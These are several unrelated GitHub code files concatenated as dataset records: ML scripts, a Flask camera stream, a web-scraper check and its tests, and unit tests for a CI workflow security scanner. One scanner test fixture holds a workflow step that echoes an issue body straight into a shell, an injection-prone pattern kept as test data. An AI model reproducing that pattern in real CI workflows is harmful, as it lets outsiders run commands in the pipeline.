check_run_gradient_descent_iteration()\n check_update_y()\n check_project_onto_PC()\n check_polynomial_kernel()\n check_rbf_kernel()\n except Exception:\n log_exit(traceback.format_exc())\n\nif __name__ == \"__main__\":\n main()\n\n# Unused codes\n# import unittest\n#\n#\n# class MyTestCase(unittest.TestCase):\n# def test_something(self):\n# self.assertEqual(True, False)\n#\n#\n# if __name__ == '__main__':\n# unittest.main()","repo_name":"asalimw/Digit_Recognition_Convulution_Neural_Network","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12101529182","text":"#coding : utf-8\n\nimport sys\nimport numpy as np\nfrom RNmod import reseau \n\ndef quadrant(tab):\n \"\"\"\n tab: tableau de 2 élements (coordonnées)\n renvoie : une classe de positionnement\n |\n [0,1,0,0] | [1,0,0,0] \n _______|________\n |\n [0,0,1,0] | [0,0,0,1]\n |\n \"\"\"\n if tab[0] > 0 and tab[1] > 0: return [1.,0.,0.,0.]\n if tab[0] < 0 and tab[1] > 0: return [0.,1.,0.,0.]\n if tab[0] < 0 and tab[1] < 0: return [0.,0.,1.,0.]\n if tab[0] > 0 and tab[1] < 0: return [0.,0.,0.,1.]\n\n\nif __name__ == \"__main__\" :\n\n nn = [2,4,4,4]\n\n # ===============\n # apprentissage\n # ===============\n napp = 400\n epochs = 100000\n eta = 0.05 \n RN = reseau.MCP(nn,verbeux=2,verbe_periode=1000,distrib_poids=\"normale\")\n\n X0 = 2. 
* np.random.uniform(size=(napp,2)) - 1.\n T = np.array([quadrant(tab) for tab in X0])\n apprentissage = X0, T\n evaluation=[]\n W,B = RN.gradient_descent( apprentissage, epochs, eta, evaluation )\n\n # ===============\n # evaluation\n # ===============\n neval = 1000\n X0 = 20. * np.random.uniform(size=(neval,2)) - 10.\n T = np.array([quadrant(tab) for tab in X0])\n evaluation = X0,T\n\n RN= reseau.MCP(nn,verbeux=0,W=W,B=B, verbe_periode=100)\n Y = RN.gradient_descent( apprentissage, 100000, 1.0, evaluation )\n\n #print(Y)\n cok = 0\n for i,v in enumerate(T):\n# print(i,v) \n vt = np.argmax(v)\n ve = np.argmax(Y[i])\n coord = X0[i]\n print(coord,ve)\n if vt == ve:\n cok +=1 \n print()\n print()\n print(\"evaluation score : {:6.2f} %\".format(cok/neval*100.)) \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"FilipeVasconcelos/pia","sub_path":"quadrants.py","file_name":"quadrants.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70771028729","text":"\nfrom singlemotiondetector import SingleMotionDetector\nfrom imutils.video import VideoStream\nfrom flask import Response\nfrom flask import Flask\nfrom flask import render_template\nimport threading\nimport argparse\nimport datetime\nimport imutils\nimport time\nimport cv2\n\n# инициализация output frame and a lock используемую для обеспечения безопасности потока обмена выходных кадров(полезно для просмотра потока различными браузерами)\n# exchanges of the output frames (useful for multiple browsers/tabs\n# are viewing tthe stream)\noutputFrame = None\nlock = threading.Lock()\n\n# инициализация flask object\napp = Flask(__name__)\n\n# initialize the video stream and позволяет датчикам камеры разогреться(приготовиться)\nvs = VideoStream('http://camera.butovo.com/axis-cgi/mjpg/video.cgi?showlength=1').start()\ntime.sleep(2.0)\n\n# декоратор route() используется для привязки функции к URL\n@app.route(\"/\")\ndef index():\n # Для визуализации шаблона вы можете использовать м��тод render_template().\n # Всё, что вам необходимо - это указать имя шаблона, а также переменные в виде именованных аргументов,\n # которые вы хотите передать движку обработки шаблонов:\n return render_template(\"index.html\")\n\n\ndef detect_motion(frameCount):\n # захватить глобальные ссылки на видеопоток, выходной кадр и блокированных переменных\n global vs, outputFrame, lock\n\n # initialize the motion detector and the total number of frames\n # read thus far\n # инициализация детектора движения и общее число кадров\n md = SingleMotionDetector(accumWeight=0.1)\n total = 0\n\n # Цикл по кадрам видео потока\n\n while True:\n # прочитать следующий кадр из видео потока, изменить его размер,\n # преобразовать в grayscale и размываем его\n frame = vs.read()\n frame = imutils.resize(frame, width=800, height = 900)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n gray = cv2.GaussianBlur(gray, (7, 7), 0)\n\n #возьмите текущую временную метку и нарисуйте ее на кадре\n timestamp = datetime.datetime.now()\n cv2.putText(frame, timestamp.strftime(\n \"%A %d %B %Y %I:%M:%S%p\"), (10, frame.shape[0] - 10),\n cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)\n\n # если общее количество кадров достигло достаточного количества для построения разумной фоновой модели,\n # то продолжайте обработку кадра\n if total > frameCount:\n # определяем движение на кадре\n motion = md.detect(gray)\n\n # проверяем было ли найдено движение на кадре\n if motion is not None:\n # 
расспаковываем кортеж и рисуем ограничительную рамку территории движения на выходном кадре\n (thresh, (minX, minY, maxX, maxY)) = motion\n cv2.rectangle(frame, (minX, minY), (maxX, maxY),\n (0, 0, 255), 2)\n\n # Обновить фоновую модель и увеличить количество считанных кадров на данныйц момент\n md.update(gray)\n total += 1\n\n # получить блокировку, установить выходной кадр и освободить блокиовку\n\n with lock:\n outputFrame = frame.copy()\n\n\ndef generate():\n # захватить глобальные ссылки на видеопоток, выходной кадр и блокированных переменных\n global outputFrame, lock\n\n # Цикл по всем выходным кадрам\n while True:\n # Ждём пока не появится блокировка\n with lock:\n # проверяем есть ли следующий выходной кадр, иначе прерываем итерацию цикла\n if outputFrame is None:\n continue\n\n # форматируем кадр в jpg\n (flag, encodedImage) = cv2.imencode(\".jpg\", outputFrame)\n\n # убеждаемся что форматирование прошло успешно\n if not flag:\n continue\n\n # вывести выходной кадр в байтовом формате\n yield (b'--frame\\r\\n' b'Content-Type: image/jpeg\\r\\n\\r\\n' +\n bytearray(encodedImage) + b'\\r\\n')\n\n\n@app.route(\"/video_feed\")\ndef video_feed():\n #\n # вернуть сгенерированный ответ вместе с конкретным типом медиа (тип mime)\n return Response(generate(),\n mimetype=\"multipart/x-mixed-replace; boundary=frame\")\n\n\n#\n# проверить, является ли это основным потоком выполнения\nif __name__ == '__main__':\n # запустить поток, который будет выполнять обнаружение движения\n t = threading.Thread(target=detect_motion, args=(\n 32,))\n t.daemon = True\n t.start()\n\n # запускаем flask app\n app.run(host=\"127.0.0.1\", port=\"8080\", debug=True,\n threaded=True, use_reloader=False)\n\n# освободить указатель видеопотока\nvs.stop()\n","repo_name":"DonMins/StreamVideo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6122,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12460749204","text":"import src.workflow_components.workflow as workflow\nfrom tests.utils import load_test_config, assert_reusable_workflow_inputs\n\nload_test_config()\n\n\ndef test_job_from_dict_steps():\n job_d = {\n \"name\": \"issue-commented\",\n \"runs-on\": \"ubuntu-latest\",\n \"steps\": [\n {\n \"name\": \"Generate GitHub App token\",\n \"uses\": \"electron/github-app-auth-action@cc6751b3b5e4edc5b9a4ad0a021ac455653b6dc8\",\n \"id\": \"generate-token\",\n \"with\": {\"creds\": \"${{ secrets.ISSUE_TRIAGE_GH_APP_CREDS }}\"},\n },\n ],\n \"_id\": \"6347a06af34cc01c884c110fd9db8964\",\n \"path\": \"electron/electron/.github/workflows/issue-commented.yml\",\n \"url\": \"https://github.com/CycodeLabs/Raven/pull/1\",\n }\n\n job = workflow.Job.from_dict(job_d)\n\n assert job._id == job_d[\"_id\"]\n assert job.name == job_d[\"name\"]\n assert job.path == job_d[\"path\"]\n assert job.machine == [job_d[\"runs-on\"]]\n assert job.uses is None\n assert job.ref is None\n assert job.with_prop is None\n assert job.url == job_d[\"url\"]\n assert len(job.steps) == 1\n assert len(job.reusable_workflow) == 0\n\n\ndef test_workflow_from_dict():\n workflow_d = {\n \"name\": \"Release notes\",\n \"on\": {\"push\": {\"branches\": [\"main\"]}, \"workflow_dispatch\": None},\n \"permissions\": {\"contents\": \"read\"},\n \"jobs\": {\n \"update_release_draft\": {\n \"permissions\": {\"contents\": \"write\", \"pull-requests\": \"write\"},\n \"runs-on\": \"ubuntu-latest\",\n \"if\": \"github.repository == 'twbs/bootstrap'\",\n \"steps\": [\n {\n \"uses\": 
\"release-drafter/release-drafter@v5\",\n \"env\": {\"GITHUB_TOKEN\": \"${{ secrets.GITHUB_TOKEN }}\"},\n }\n ],\n }\n },\n \"path\": \"twbs/bootstrap/.github/workflows/release-notes.yml\",\n \"url\": \"https://github.com/CycodeLabs/Raven/pull/1\",\n \"is_public\": True,\n }\n\n wf = workflow.Workflow.from_dict(workflow_d)\n\n assert wf.name == workflow_d[\"name\"]\n assert wf.path == workflow_d[\"path\"]\n assert wf.trigger == [\"push\", \"workflow_dispatch\"]\n assert wf.permissions == [\"contents:read\"]\n assert wf.url == workflow_d[\"url\"]\n assert len(wf.jobs) == 1\n\n\ndef test_job_from_dict_uses():\n job_d = {\n \"name\": \"test-firefox-safari\",\n \"uses\": \"./.github/workflows/build_reusable.yml\",\n \"with\": {\n \"skipForDocsOnly\": \"yes\",\n },\n \"secrets\": \"inherit\",\n \"_id\": \"f796b4c01ecb6021e6a30ec7466ab11a\",\n \"path\": \"vercel/next.js/.github/workflows/build_and_test.yml\",\n \"url\": \"https://github.com/CycodeLabs/Raven/pull/1\",\n }\n\n job = workflow.Job.from_dict(job_d)\n\n assert job._id == job_d[\"_id\"]\n assert job.name == job_d[\"name\"]\n assert job.path == job_d[\"path\"]\n assert job.machine is None\n assert job.uses == job_d[\"uses\"]\n assert job.ref is None\n assert job.url == job_d[\"url\"]\n assert job.with_prop == [\"skipForDocsOnly:yes\"]\n assert len(job.steps) == 0\n\n\ndef test_step_from_dict_uses():\n step_d = {\n \"name\": \"Generate GitHub App token\",\n \"uses\": \"electron/github-app-auth-action@cc6751b3b5e4edc5b9a4ad0a021ac455653b6dc8\",\n \"with\": {\"creds\": \"${{ secrets.ISSUE_TRIAGE_GH_APP_CREDS }}\"},\n \"_id\": \"9a42f7bb6c8e5be00c1d36d54ac7bdb6\",\n \"path\": \"electron/electron/.github/workflows/issue-commented.yml\",\n \"url\": \"https://github.com/CycodeLabs/Raven/pull/1\",\n }\n\n step = workflow.Step.from_dict(step_d)\n\n assert step._id == step_d[\"_id\"]\n assert step.name == step_d[\"name\"]\n assert step.path == step_d[\"path\"]\n assert step.run is None\n assert step.uses == step_d[\"uses\"]\n assert step.url == step_d[\"url\"]\n assert step.ref == \"cc6751b3b5e4edc5b9a4ad0a021ac455653b6dc8\"\n assert step.with_prop == [\"creds:${{ secrets.ISSUE_TRIAGE_GH_APP_CREDS }}\"]\n\n\ndef test_step_from_dict_run():\n step_d = {\n \"name\": \"Autolabel based on affected areas\",\n \"run\": \"echo ${{ github.event.issue.body }}\",\n \"_id\": \"1386cfbaf5513e27c090 133287e01fe\",\n \"path\": \"vercel/next.js/.github/workflows/issue_validator.yml\",\n \"url\": \"https://github.com/CycodeLabs/Raven/pull/1\",\n }\n\n step = workflow.Step.from_dict(step_d)\n\n assert step._id == step_d[\"_id\"]\n assert step.name == step_d[\"name\"]\n assert step.path == step_d[\"path\"]\n assert step.uses is None\n assert step.run == step_d[\"run\"]\n assert step.ref is None\n assert step.url == step_d[\"url\"]\n assert step.with_prop is None\n assert len(step.using_param) == 1\n\n\ndef test_reusable_workflow_from_dict():\n workflow_d = {\n \"name\": \"Release notes\",\n \"on\": {\n \"workflow_call\": {\n \"inputs\": {\n \"input_1\": {\n \"required\": True,\n \"default\": \"default_value_1\",\n \"description\": \"description_1\",\n },\n \"input_2\": {\n \"required\": False,\n \"default\": \"default_value_2\",\n \"description\": \"description_2\",\n },\n }\n }\n },\n \"permissions\": {\"contents\": \"read\"},\n \"jobs\": {\n \"update_release_draft\": {\n \"permissions\": {\"contents\": \"write\", \"pull-requests\": \"write\"},\n \"runs-on\": \"ubuntu-latest\",\n \"if\": \"github.repository == 'twbs/bootstrap'\",\n \"steps\": [\n {\n \"uses\": 
\"release-drafter/release-drafter@v5\",\n \"env\": {\"GITHUB_TOKEN\": \"${{ secrets.GITHUB_TOKEN }}\"},\n }\n ],\n }\n },\n \"path\": \"twbs/bootstrap/.github/workflows/release-notes.yml\",\n \"url\": \"https://github.com/CycodeLabs/Raven/pull/1\",\n \"is_public\": True,\n }\n\n wf = workflow.Workflow.from_dict(workflow_d)\n\n assert wf.name == workflow_d[\"name\"]\n assert wf.path == workflow_d[\"path\"]\n assert wf.trigger == [\"workflow_call\"]\n assert wf.permissions == [\"contents:read\"]\n assert wf.url == workflow_d[\"url\"]\n assert len(wf.jobs) == 1\n\n assert_reusable_workflow_inputs(wf, workflow_d)\n","repo_name":"CycodeLabs/raven","sub_path":"tests/unit/test_workflow.py","file_name":"test_workflow.py","file_ext":"py","file_size_in_byte":6414,"program_lang":"python","lang":"en","doc_type":"code","stars":422,"dataset":"github-code","pt":"77"} +{"seq_id":"878601820","text":"veridion_match_enrich_api_key = (\n \"api-key\"\n)\nimport requests\nimport json\n\ndef company_profile(company_name, website):\n url = \"https://data.veridion.com/match/v4/companies\"\n headers = {\n \"x-api-key\": veridion_match_enrich_api_key,\n \"Content-type\": \"application/json\",\n }\n\n data = {\"commercial_names\": [company_name], \"website\": website}\n\n response = requests.post(url, headers=headers, json=data)\n\n json_response = response.json()\n\n company_informations = {}\n company_informations[\"company_commercial_names\"] = json_response[\n \"company_commercial_names\"\n ]\n company_informations[\"main_business_category\"] = json_response[\n \"main_business_category\"\n ]\n\n\n locations = []\n for location in json_response[\"locations\"]:\n if location[\"latitude\"] and location[\"longitude\"]:\n locations.append(location)\n\n company_informations[\"locations\"] = locations\n company_informations[\"num_locations\"] = json_response[\"num_locations\"]\n company_informations[\"employee_count\"] = json_response[\"employee_count\"]\n company_informations[\"estimated_revenue\"] = json_response[\"estimated_revenue\"]\n company_informations[\"main_country\"] = json_response[\"main_country\"]\n\n\n return json.dumps(company_informations, ensure_ascii=False).encode(\"utf-8\")\n","repo_name":"mihaescurazvan/Ecodion","sub_path":"dummy_script.py","file_name":"dummy_script.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33310664707","text":"from services.market.MarketService import MarketService\n\n\n# returns list of provived tickers after main command\ndef get_provided_tickers(command):\n\t# retrieving params passed after main command\n\ttickers = command.split(' ')[1::]\n\treturn tickers\n\n\n# iterates through tickers and apply passed template\ndef format_data_via_template(data, template):\n\tresponse_text = ''\n\n\t# formatting data from ticker\n\tfor ticker in data:\n\t\tfor key in ticker:\n\t\t\tif ticker[key] is None:\n\t\t\t\tticker[key] = '-'\n\n\t\tticker_text = template.format(ticker=ticker)\n\t\tresponse_text += ticker_text\n\t\n\treturn response_text\n\n\n# returns ticker template according to passed tempate type\ndef get_ticker_template(template_type):\n\tminimal_ticker_template = \"\\\n\t\tTicker: {ticker[ticker]}\\n\\\n\t\tName: {ticker[name]}\\n\\\n\t\tPrice: {ticker[askPrice]}\\\n\t\\n\\n\"\n\n\tdetailed_ticker_template = \"\\\n\t\tTicker: {ticker[ticker]}\\n\\\n\t\tName: {ticker[name]}\\n\\\n\t\tBid price: {ticker[bidPrice]}\\n\\\n\t\tBid size: {ticker[bidSize]}\\n\\\n\t\tAsk 
price: {ticker[askPrice]}\\n\\\n\t\tAsk size: {ticker[askSize]}\\n\\\n\t\tLast trade: {ticker[last]}\\n\\\n\t\tLow price: {ticker[low]}\\n\\\n\t\tHigh price: {ticker[high]}\\n\\\n\t\tOpen price: {ticker[open]}\\n\\\n\t\tPrevious close price: {ticker[prevClose]}\\\n\t\\n\\n\"\n\n\ttemplate = None\n\n\tif template_type == 'minimal': \n\t\ttemplate = minimal_ticker_template\n\telif template_type == 'detailed':\n\t\ttemplate = detailed_ticker_template\n\n\treturn template\n\n\n# sends data of market tickers or data of provided tickers\ndef send_market_data(bot, message):\n\tprovided_tickers = get_provided_tickers(message.text)\n\n\t# if ticker was provided\n\tif(len(provided_tickers) > 0):\n\t\tdata = MarketService.get_tickers_data(provided_tickers)\t\t\n\t\tresponse_template = get_ticker_template('detailed')\n\n\t\t# if provided tickers are incorrect\n\t\tif(len(data) <= 0):\n\t\t\treturn bot.send_message(message.chat.id, 'You have provided non-existing tickers')\n\n\telse:\n\t\tdata = MarketService.get_market_data()\n\t\tresponse_template = get_ticker_template('minimal')\n\t\t\n\t\t# if stock market has no tickers\n\t\tif len(data) <= 0:\n\t\t\treturn bot.send_message(message.chat.id, 'There are no avaliable stocks on PyFinance Market right now')\n\n\n\tresponse_text = 'PyFinance Stock Market:\\n\\n'\n\tresponse_text += format_data_via_template(data, response_template)\n\tresponse_text += '\\nAll prices are specified in USD\\n\\n'\n\n\tbot.send_message(message.chat.id, text=response_text, parse_mode='HTML')\n\n\n","repo_name":"Vladislav0Art/PyFinance","sub_path":"services/bot/methods/send_market_data.py","file_name":"send_market_data.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28850077192","text":"import json\nimport re\n\nimport numpy as np\nfrom joblib import dump\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.feature_selection import SelectKBest, chi2\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\n\n\ndef get_feature_names(path):\n names = []\n regex = re.compile(r'^(.+)\\:\\s+(.+)\\.$')\n\n with open(path) as file:\n for line in file:\n match = regex.match(line)\n if match:\n names.append(match.group(1))\n\n return names\n\n\ndataset_dir = '../../../../spambase/'\nfeature_names = get_feature_names(dataset_dir + 'spambase.names')\nwith open(\"feature_names.json\", \"w\") as f:\n json.dump(feature_names, f)\n\ndata = np.genfromtxt(dataset_dir + 'spambase.data', delimiter=',')\n\nX, y = data[:, :-1], data[:, -1]\n\npipeline = Pipeline([\n ('feature_selection', SelectKBest(chi2, k=45)),\n ('scaler', StandardScaler()),\n ('classifier', RandomForestClassifier(n_estimators=300, max_features='log2'))\n])\n\npipeline.fit(X, y)\n\ndump(pipeline, 'model.joblib')\n","repo_name":"adam-kwiatkowski/spambase-ml","sub_path":"backend/app/models/ml/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"43317997333","text":"import sys\nimport re\nimport socket\nimport struct\nimport operator\n\ndef ip_address_is_valid(address):\n if address < 0x1000000:\n return False\n try:\n socket.inet_aton(int_to_formatted_ip(address))\n except socket.error:\n return False\n except struct.error:\n return False\n else:\n return True\n\ndef int_to_formatted_ip(x):\n return socket.inet_ntoa(struct.pack('!L', x))\n\ndef 
_find_helper(regex, formatter, content):\n ips = []\n for m in re.finditer(regex, content):\n ips.append(formatter(m.group(1)))\n return content, ips\n\ndef find_binary(content):\n regex = \"([0,1]{8}[\\.]?[0-1]{8}[\\.]?[0-1]{8}[\\.]?[0-1]{8})\"\n def formatter(ip):\n return int(ip.replace(\".\", \"\"), 2)\n return _find_helper(regex, formatter, content)\n\ndef find_dotted_hex(content):\n regex = \"(0x[0-9a-fA-F]{2}\\.0x[0-9a-fA-F]{2}\\.0x[0-9a-fA-F]{2}\\.0x[0-9a-fA-F]{2})\"\n def formatter(ip):\n return int(ip.replace(\"0x\", \"\").replace(\".\", \"\"), 16)\n return _find_helper(regex, formatter, content)\n\ndef find_dotted_octal(content):\n regex = \"([0-7]{4}\\.[0-7]{4}\\.[0-7]{4}\\.[0-7]{4})\"\n def formatter(ip):\n int_value = 0\n for sub_octal in ip.split('.'):\n int_value <<= 8\n int_value |= int(sub_octal, 8)\n return int_value\n return _find_helper(regex, formatter, content)\n\ndef find_dotted_decimal(content):\n regex = \"([0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3})\"\n def formatter(ip):\n int_value = 0\n for sub in ip.split('.'):\n int_value <<= 8\n int_value |= int(sub)\n return int_value\n return _find_helper(regex, formatter, content)\n\ndef find_hex(content):\n regex = \"(0x[0-9a-fA-F]{8})\"\n def formatter(ip):\n return int(ip.replace(\"0x\", \"\"), 16)\n return _find_helper(regex, formatter, content)\n\ndef find_octal(content):\n regex = \"(0[0-7]+)\"\n def formatter(ip):\n return int(ip, 8)\n\n return _find_helper(regex, formatter, content)\ndef find_decimal(content):\n regex = \"([0-9]+)\"\n def formatter(ip):\n return int(ip)\n return _find_helper(regex, formatter, content)\n\ndef main(content):\n all_ips = []\n for func in [find_dotted_octal, find_dotted_hex, find_binary,\n find_dotted_decimal, find_hex, find_octal, find_decimal]:\n content, ips = func(content)\n all_ips.extend(ips)\n all_ips_frequency_map = {}\n for ip in all_ips:\n if not ip_address_is_valid(ip):\n continue\n if ip in all_ips_frequency_map:\n all_ips_frequency_map[ip] += 1\n else:\n all_ips_frequency_map[ip] = 1\n sorted_ips = sorted(all_ips_frequency_map.items(), key=operator.itemgetter(1), reverse=True)\n max_frequency = sorted_ips[0][1]\n result = []\n for ip in sorted_ips:\n if ip[1] != max_frequency:\n break\n result.append(int_to_formatted_ip(ip[0]))\n print(' '.join(result))\n\nif __name__ == \"__main__\":\n with open(sys.argv[1], 'r') as content_file:\n content = content_file.read()\n main(content)\n","repo_name":"daleysoftware/codeeval","sub_path":"1-moderate/seek-for-an-intruder/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"77"} +{"seq_id":"20084900486","text":"import unittest\nfrom mock import Mock\nfrom mock import patch\nimport re\n\nimport web_scraping\n\n\nclass TestWebScraping(unittest.TestCase):\n def setUp(self):\n self.mock_log = Mock()\n web_scraping.WebScraping.log = self.mock_log\n\n self.mock_gauge = Mock()\n web_scraping.WebScraping.gauge = self.mock_gauge\n\n self.requests_patcher = patch('web_scraping.requests.get')\n self.mock_requests = self.requests_patcher.start()\n\n self.mock_content = Mock()\n\n def tearDown(self):\n self.requests_patcher.stop()\n\n def setup_mock(self, content=None):\n self.mock_log.reset_mock()\n self.mock_gauge.reset_mock()\n self.mock_requests.reset_mock()\n self.mock_content.reset_mock()\n if content is not None:\n self.mock_content.content = content\n self.mock_requests.return_value = self.mock_content\n else:\n 
self.mock_requests.side_effect = Exception('fail')\n\n def get_log(self, level, order):\n log = getattr(self.mock_log, level)\n return log.call_args_list[order - 1][0][0]\n\n def assert_log(self, level, order, string):\n self.assertEqual(self.get_log(level, order), string)\n\n def assert_log_match(self, level, order, match):\n self.assertTrue(re.match(match, self.get_log(level, order)))\n\n def assert_log_count(self, level, count):\n log = getattr(self.mock_log, level)\n if count == 0:\n log.assert_not_called()\n else:\n self.assertEqual(len(log.call_args_list), count)\n\n def assert_gauge(self, name, num):\n self.mock_gauge.assert_called_with(name, num)\n\n def assert_gauge_not_called(self):\n self.mock_gauge.assert_not_called()\n\n def assert_request_url(self, url):\n self.assertEqual(self.mock_requests.call_args[0][0], url)\n\n def assert_request_not_called(self):\n self.mock_requests.assert_not_called()\n\n def test_validation(self):\n ws = web_scraping.WebScraping()\n\n self.setup_mock()\n ws.check({})\n self.assert_log_count('info', 0)\n self.assert_log_count('error', 1)\n self.assert_log('error', 1, 'skipping instance, no name found.')\n self.assert_request_not_called()\n self.assert_gauge_not_called()\n\n self.setup_mock()\n ws.check({ 'name' : 'test' })\n self.assert_log_count('info', 0)\n self.assert_log_count('error', 1)\n self.assert_log('error', 1, 'skipping instance, no url found.')\n self.assert_request_not_called()\n self.assert_gauge_not_called()\n\n self.setup_mock()\n ws.check({ 'name' : 'test', 'url' : 'http://example.com' })\n self.assert_log_count('info', 0)\n self.assert_log_count('error', 1)\n self.assert_log('error', 1, 'skipping instance, no xpath found.')\n self.assert_request_not_called()\n self.assert_gauge_not_called()\n\n def test_invalid_url(self):\n name = 'test'\n url = 'bad url'\n\n self.setup_mock()\n ws = web_scraping.WebScraping()\n ws.check({\n 'name' : name,\n 'url' : url,\n 'xpath' : '',\n })\n\n self.assert_log_count('info', 0)\n self.assert_log_count('error', 1)\n self.assert_log_match('error', 1, r'%s : failed to get website' % name)\n self.assert_request_url(url)\n self.assert_gauge_not_called()\n\n def test_invalid_value(self):\n name = 'test'\n url = 'http://example.com'\n\n self.setup_mock('
test
')\n        ws = web_scraping.WebScraping()\n        ws.check({\n            'name' : name,\n            'url' : url,\n            'xpath' : '//*[@id=\"hoge\"]/text()',\n        })\n\n        self.assert_log_count('info', 0)\n        self.assert_log_count('error', 1)\n        self.assert_log('error', 1, '%s : failed to get value (default value used) : could not convert string to float: ' % name)\n        self.assert_request_url(url)\n        self.assert_gauge_not_called()\n\n    def test_success(self):\n        name = 'test'\n        url = 'http://example.com'\n        value = '-100.1'\n\n        self.setup_mock('
test=%s
' % value)\n        ws = web_scraping.WebScraping()\n        ws.check({\n            'name' : name,\n            'url' : url,\n            'xpath' : '//*[@id=\"hoge\"]/text()',\n        })\n\n        self.assert_log_count('info', 1)\n        self.assert_log('info', 1, '%s = %f' % (name, float(value)))\n        self.assert_log_count('error', 0)\n        self.assert_request_url(url)\n        self.assert_gauge(name, float(value))\n\n    def test_default_value(self):\n        name = 'test'\n        url = 'http://example.com'\n        default_value = '100.2'\n\n        self.setup_mock('
test=-100.1
')\n        ws = web_scraping.WebScraping()\n        ws.check({\n            'name' : name,\n            'url' : url,\n            'xpath' : '//*[@id=\"fuga\"]/text()',\n            'default' : default_value,\n        })\n\n        self.assert_log_count('info', 2)\n        self.assert_log('info', 1, '%s : failed to get value (default value used)' % name)\n        self.assert_log('info', 2, '%s = %f' % (name, float(default_value)))\n        self.assert_log_count('error', 0)\n        self.assert_request_url(url)\n        self.assert_gauge(name, float(default_value))\n\n    def test_invalid_default_value(self):\n        name = 'test'\n        url = 'http://example.com'\n        default_value = 'invalid'\n\n        self.setup_mock('
test=-100.1
')\n        ws = web_scraping.WebScraping()\n        ws.check({\n            'name' : name,\n            'url' : url,\n            'xpath' : '//*[@id=\"fuga\"]/text()',\n            'default' : default_value,\n        })\n\n        self.assert_log_count('info', 1)\n        self.assert_log('info', 1, '%s : failed to get value (default value used)' % name)\n        self.assert_log_count('error', 1)\n        self.assert_log('error', 1, '%s : invalid default value : could not convert string to float: %s' % (name, default_value))\n        self.assert_request_url(url)\n        self.assert_gauge_not_called()\n","repo_name":"mounemoi/datadog-web-scraper","sub_path":"tests/test_web_scraping.py","file_name":"test_web_scraping.py","file_ext":"py","file_size_in_byte":6166,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"}
{"seq_id":"16668845211","text":"#!/usr/local/bin/python3\n\nfrom cgitb import enable\nenable()\n\nfrom cgi import FieldStorage\nfrom html import escape\nfrom hashlib import sha256\nfrom time import time\nfrom shelve import open\nfrom http.cookies import SimpleCookie\n\n\nform_data = FieldStorage()\nattempt = ''\nresult = ''\njavascript =''\nscore = escape(form_data.getfirst('score', '').strip())\nif len(form_data) != 0:\n    attempt = escape(form_data.getfirst('guess', '').strip())\n    if not attempt:\n        result =\"Please select either A,B or C \"\n    else:\n        try:\n            if attempt == \"A\":\n                result =\"\"\"Correct \"\"\"\n                javascript =\"\"\"\"\"\"\n            if attempt == \"B\":\n                result =\"Incorrect \"\n                javascript =\"\"\"\"\"\"\n            if attempt == \"C\":\n                result =\"Incorrect \"\n                javascript =\"\"\"\"\"\"\n        except:\n            result = \"Sorry we are experiencing problems please contact later \"\n\n\n\n\n\nprint('Content-Type: text/html')\nprint()\nprint(\"\"\"\n    \n    \n        \n        \n\n        %s\n        \n        Zombie Mayhem\n    \n    \n        \n        What day is World Zombie Day?\n        \n            \n            \n            \n            \n            \n            \n        \n\n\n        \n        Score so far:%s
\n \n %s\n \"\"\" % (javascript,score,result))\n","repo_name":"sv6-UCC/Web_Development_Project","sub_path":"q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34724800515","text":"import hashlib\n\nfrom pypbc import *\n\nfrom SgxParam import pairing\n\n\ndef Setup(qbits, rbits, nums):\n pubk = [0]\n # 产生一个G_1群的生成元\n n = nums\n g = Element.random(pairing, G1)\n a = Element.random(pairing, Zr)\n for i in range(1, 2 * n + 1):\n # g_i = g ** (a ** i)\n g_i = Element(pairing, G1, value=g ** (a ** i))\n pubk.append(g_i)\n return pairing, g, n, pubk\n\n\ndef Keygen(pairing, g):\n y = Element.random(pairing, Zr)\n # v = g ** y\n v = Element(pairing, G1, value=g ** y)\n pk = v\n msk = y\n keypair = [pk, msk]\n return keypair\n\n\ndef Encrypt(pk, i, N, pairing, g, n, pubk):\n g_1 = pubk[1]\n g_n = pubk[n]\n g_i = pubk[i]\n t = Element.random(pairing, Zr)\n c1 = g ** t\n c2 = (pk * g_i) ** t\n cw_list = []\n for w in N:\n hkp1 = hashlib.sha256(str(w).encode()).hexdigest()\n hash_G_1 = Element.from_hash(pairing, G1, hkp1)\n on = pairing.apply(g, hash_G_1) ** t\n down = pairing.apply(g_1, g_n) ** t\n cw = Element.__ifloordiv__(on, down)\n cw_list.append(cw)\n elements = (c1, c2, cw_list)\n return elements\n\n\ndef Extract(msk, S, pairing, n, pubk):\n kagg = Element.one(pairing, G1)\n for j in S:\n item = n + 1 - j\n element = pubk[item]\n mul = element ** msk\n kagg = kagg * mul\n return kagg\n\n\ndef Trapdoor(kagg, w, pairing):\n hkp1 = hashlib.sha256(str(w).encode()).hexdigest()\n hash_G_1 = Element.from_hash(pairing, G1, hkp1)\n Tr = kagg * hash_G_1\n return 